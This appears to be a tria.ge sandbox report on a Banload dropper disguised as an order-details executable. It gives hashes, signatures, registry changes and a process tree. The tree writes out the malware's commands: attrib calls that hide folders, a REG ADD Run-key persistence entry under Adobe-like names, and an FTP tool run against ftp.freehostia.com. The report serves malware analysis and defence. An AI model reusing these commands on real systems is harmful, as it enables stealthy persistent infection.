Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
3s -
max time network
1s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
20/05/2024, 04:40
Static task
static1
Behavioral task
behavioral1
Sample
Order details 20160623103529.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
Order details 20160623103529.exe
Resource
win10v2004-20240508-en
General
-
Target
Order details 20160623103529.exe
-
Size
2.3MB
-
MD5
07a4eab7815d7240e9d3d38f7df9be36
-
SHA1
2fcb5ee484b60dcadd3ef4aa4ab2f6b22f8e78f4
-
SHA256
14d2a798476194ebc48db82141fa597c7ac6a91094f36a1311d857579c867017
-
SHA512
4fe7adbfcd46ef19d3ce73f4342a197579d6653c7bba96e65813fe6d076cadc87ff2e0d640035656a044566e21e21dcf4393191f4d6330f25319f476611686ab
-
SSDEEP
49152:Ipgs8ABpNAcbBicSTgbDgtcBbWRzfYb/kL+agsNFCriQmew54a11Fp:IGs8AvNzXgtcpEfFFC2QVbalp
Malware Config
Signatures
-
Banload
Banload variants download malicious files, then install and execute the files.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ adbr01.exe -
Sets file to hidden 1 TTPs 5 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 1944 attrib.exe 2492 attrib.exe 856 attrib.exe 1244 attrib.exe 2484 attrib.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion adbr01.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate adbr01.exe -
Executes dropped EXE 3 IoCs
pid Process 772 Adobeta.exe 912 adbr01.exe 1740 adbr01.exe -
Loads dropped DLL 5 IoCs
pid Process 1968 cmd.exe 1968 cmd.exe 1968 cmd.exe 1968 cmd.exe 912 adbr01.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdobeA = "C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\Adobe Inc\\AdobeRead\\acro4.bat" reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 1764 ipconfig.exe -
Modifies registry class 13 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\TypeLib\ = "{012F24C1-35B0-11D0-BF2D-0000E8D0D146}" adbr01.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\Version\ = "1.0" adbr01.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\TypeLib adbr01.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\Version adbr01.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187} adbr01.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ProgID adbr01.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\VersionIndependentProgID\ = "Office.awsdc" adbr01.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\ThreadingModel = "Apartment" adbr01.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\VersionIndependentProgID adbr01.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\ = "C:\\PROGRA~2\\MICROS~1\\Office14\\IEAWSDC.DLL" adbr01.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ProgID\ = "Office.awsdc.1" adbr01.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ = "Microsoft Office Template and Media Control" adbr01.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32 adbr01.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2864 DllHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2128 wrote to memory of 2696 2128 Order details 20160623103529.exe 28 PID 2128 wrote to memory of 2696 2128 Order details 20160623103529.exe 28 PID 2128 wrote to memory of 2696 2128 Order details 20160623103529.exe 28 PID 2128 wrote to memory of 2696 2128 Order details 20160623103529.exe 28 PID 2128 wrote to memory of 2696 2128 Order details 20160623103529.exe 28 PID 2128 wrote to memory of 2696 2128 Order details 20160623103529.exe 28 PID 2128 wrote to memory of 2696 2128 Order details 20160623103529.exe 28 PID 2696 wrote to memory of 2104 2696 WScript.exe 29 PID 2696 wrote to memory of 2104 2696 WScript.exe 29 PID 2696 wrote to memory of 2104 2696 WScript.exe 29 PID 2696 wrote to memory of 2104 2696 WScript.exe 29 PID 2696 wrote to memory of 2104 2696 WScript.exe 29 PID 2696 wrote to memory of 2104 2696 WScript.exe 29 PID 2696 wrote to memory of 2104 2696 WScript.exe 29 PID 2104 wrote to memory of 2968 2104 cmd.exe 32 PID 2104 wrote to memory of 2968 2104 cmd.exe 32 PID 2104 wrote to memory of 2968 2104 cmd.exe 32 PID 2104 wrote to memory of 2968 2104 cmd.exe 32 PID 2104 wrote to memory of 2968 2104 cmd.exe 32 PID 2104 wrote to memory of 2968 2104 cmd.exe 32 PID 2104 wrote to memory of 2968 2104 cmd.exe 32 PID 2104 wrote to memory of 2492 2104 cmd.exe 33 PID 2104 wrote to memory of 2492 2104 cmd.exe 33 PID 2104 wrote to memory of 2492 2104 cmd.exe 33 PID 2104 wrote to memory of 2492 2104 cmd.exe 33 PID 2104 wrote to memory of 2492 2104 cmd.exe 33 PID 2104 wrote to memory of 2492 2104 cmd.exe 33 PID 2104 wrote to memory of 2492 2104 cmd.exe 33 PID 2104 wrote to memory of 856 2104 cmd.exe 34 PID 2104 wrote to memory of 856 2104 cmd.exe 34 PID 2104 wrote to memory of 856 2104 cmd.exe 34 PID 2104 wrote to memory of 856 2104 cmd.exe 34 PID 2104 wrote to memory of 856 2104 cmd.exe 34 PID 2104 wrote to memory of 856 2104 cmd.exe 34 PID 2104 wrote to memory of 856 2104 cmd.exe 34 PID 2104 wrote to memory of 1244 2104 cmd.exe 35 PID 2104 wrote to memory of 1244 2104 cmd.exe 35 PID 2104 wrote to memory of 1244 2104 cmd.exe 35 PID 2104 wrote to memory of 1244 2104 cmd.exe 35 PID 2104 wrote to memory of 1244 2104 cmd.exe 35 PID 2104 wrote to memory of 1244 2104 cmd.exe 35 PID 2104 wrote to memory of 1244 2104 cmd.exe 35 PID 2104 wrote to memory of 2484 2104 cmd.exe 36 PID 2104 wrote to memory of 2484 2104 cmd.exe 36 PID 2104 wrote to memory of 2484 2104 cmd.exe 36 PID 2104 wrote to memory of 2484 2104 cmd.exe 36 PID 2104 wrote to memory of 2484 2104 cmd.exe 36 PID 2104 wrote to memory of 2484 2104 cmd.exe 36 PID 2104 wrote to memory of 2484 2104 cmd.exe 36 PID 2104 wrote to memory of 1944 2104 cmd.exe 37 PID 2104 wrote to memory of 1944 2104 cmd.exe 37 PID 2104 wrote to memory of 1944 2104 cmd.exe 37 PID 2104 wrote to memory of 1944 2104 cmd.exe 37 PID 2104 wrote to memory of 1944 2104 cmd.exe 37 PID 2104 wrote to memory of 1944 2104 cmd.exe 37 PID 2104 wrote to memory of 1944 2104 cmd.exe 37 PID 2104 wrote to memory of 1964 2104 cmd.exe 38 PID 2104 wrote to memory of 1964 2104 cmd.exe 38 PID 2104 wrote to memory of 1964 2104 cmd.exe 38 PID 2104 wrote to memory of 1964 2104 cmd.exe 38 PID 2104 wrote to memory of 1964 2104 cmd.exe 38 PID 2104 wrote to memory of 1964 2104 cmd.exe 38 PID 2104 wrote to memory of 1964 2104 cmd.exe 38 PID 1964 wrote to memory of 1968 1964 WScript.exe 39 -
Views/modifies file attributes 1 TTPs 5 IoCs
pid Process 2492 attrib.exe 856 attrib.exe 1244 attrib.exe 2484 attrib.exe 1944 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Order details 20160623103529.exe"C:\Users\Admin\AppData\Local\Temp\Order details 20160623103529.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat" /quiet /passive /norestart"3⤵
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\"4⤵
- Enumerates system info in registry
PID:2968
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2492
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:856
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1244
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2484
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1944
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adob9.vbs"4⤵
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\rea01.bat" /quiet /passive /norestart"5⤵
- Loads dropped DLL
PID:1968 -
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exeAdobeta.exe -a -c -d -natpasv -s:01.klm ftp.freehostia.com -s6⤵
- Executes dropped EXE
PID:772
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "AdobeA" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\acro4.bat"6⤵
- Adds Run key to start application
PID:492
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all6⤵
- Gathers network information
PID:1764
-
-
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exeadbr01.exe -f "011.011"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:912 -
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exeadbr01.exe -f "011.011"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Modifies registry class
PID:1740
-
-
-
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}1⤵
- Suspicious use of FindShellTrayWindow
PID:2864
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Modify Registry
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
118B
MD59275864a850bf2c9d21d8b158be4999e
SHA1838ebcbc1a27c9d8dbad268de77877bf892f5223
SHA256ff279561e09b341b77ace01b0d71152e8471e5c8767aedaa16c9096774727511
SHA512ba58a479507bf8e705189e3283ac5a91c11f6ac276efb2e40ee583a1595cbf7c5204c56fab7a46bfae19d7089f25466303f1baafc7d260d86cb48db073786a8d
-
Filesize
124KB
MD51a1075e5e307f3a4b8527110a51ce827
SHA1f453838ed21020b7ca059244feea8579e5aa74ef
SHA256ddd90e3546e95b0991df26a17cf26fa2f1c20d6a1fd4ffccf1e9b3ec3d3810d5
SHA512b6b70c6cb3cdb05a69c75b86c1fa0fadb38de0391e1fa17daff7d12dfae2a9f483546d9bf1001ff622694fdf8a28b85cd30fc541c25be62df022d22ca17decc1
-
Filesize
556B
MD597410477dc9501dffca4ea4b1ae57273
SHA1fb573b3bf4eba734b0f32db1a5b7ff78de36b064
SHA2563836545f759c1ff93892ea0ef81424c8acdef7dc9440e8404bc04662fe7e6f2c
SHA5123d22d0bf5375f3cedc7f6bdc0b2fac8de834a1b80567a2395046c5aada74d87e8338fbd0f787b14dbe3f5914c9a751597f1332d89d19f6d96de195ef334cc915
-
Filesize
186B
MD509082253605a7171f078e26dc308a667
SHA1585286c9fcda5e66e7fdb4e17a7bab6160183d46
SHA256f4c67dc01ce4bf55e1b574009c49d481dad0d33070f53f42bc76807eb5e324ed
SHA512adb4a1fec6feada14b8b4f28730e098a0af19f1e7c2fa0fe684030d1171e56c88813661a2352ce598221853fce3dc8a4bb3b2e1dc80b6471c41d2598f635b1d8
-
Filesize
189B
MD5ce8041824149d8266dbb0ad9688224d7
SHA13ab653c43ce66681ceaab90193e1a4c95d998090
SHA2560a697bf8507b3f517afe7d67ed0f12f1a8d0edbb72252d75cc7677d6e2e638c5
SHA512e1a205a1665fe5beb3c53cdcff4eb9c66a4773d730215ff87a179f3c825d342f8f7e8b5e65e45e6a1f13dfe7f58a09f5a920ce9416fe231d74ad1d99e60bd21d
-
Filesize
256KB
MD597b8dbcc7b3cc290aef4241df911ac2e
SHA1733ababbcd278821d4e3ee78580841981f26642e
SHA256c44ca1fe145c4f0dcea4efb95171cbf16dfec9fe66a603fbe29c94c21050a023
SHA5124adaa7621e2c858e6541792146260142e1d28683ec1515a743a56bc106ab425edfce856ef3b0d146d63704b34694c9e666a39e3845a097d41cbf465537ec9b25
-
Filesize
139B
MD589412aba215b6cd18b8a64c4485fa03f
SHA137089346499f54a7d89262a67d95c8764ab3ca1f
SHA2569607fb2a0e2ea02cd674272680a238d21539071db3c9735818a1abf11ff30ff1
SHA5127afe571b9ad4b67fdf00cecade8645e82471c1c5098b563a2e2d0cff96905f34b6071eb93c86f59850335e7e88d988d6c016553cdbbe1a693e1cdc3082a3790b
-
Filesize
2.1MB
MD53351585db91521d6fa543490ac7cd6a5
SHA19be2b3abf17613d7386f9949cabaedd466902e82
SHA2563f1749d4a96eb85fe2104fef8d871d9696b456615ff3775d484cc2c2431f40b4
SHA512804b293c02a5526b8c7d5dc48edc18cb33e06a07b39a0b3f46d8d34387e1848b245b087fd820a4a14ac4866c85a120837217ddc9bb47ef32e1b5b80f0dc66d30
-
Filesize
2.1MB
MD575a35514185cd2c5cf5aab50cc380963
SHA1f1ff1e088f910398a48f4f7dfddec24e6d6d1734
SHA2561cf5eb2f7c5cd5b7d036478d30408212494ab73190172c63df67e66350374937
SHA512ca6bb433fe5fd4ea350dfa40dd80bb6913ea4693b6ba6188e67f55e4211db9975fd7af570546bce0fd877a3bfeceadd4da9ba9c46c6cb69f9963914739e16297
-
Filesize
1KB
MD5ce7ccd3b48dbe8f34db3b2b1222e4fd9
SHA1e25f9947c2b250c98dffd7bfeaca75b4db17dcfd
SHA2566374a35588bd20362e54dff9e8cf0dffba5ba0ec5952a08fb51caea54c5d228e
SHA512ee6b389f29d30a572c7c9837575df7ff197589824c5377f02b7c453572139d4ecc75c5b194a601b953fbb7e692b3929faf8c4e14e7fec51cd25d71658636ef99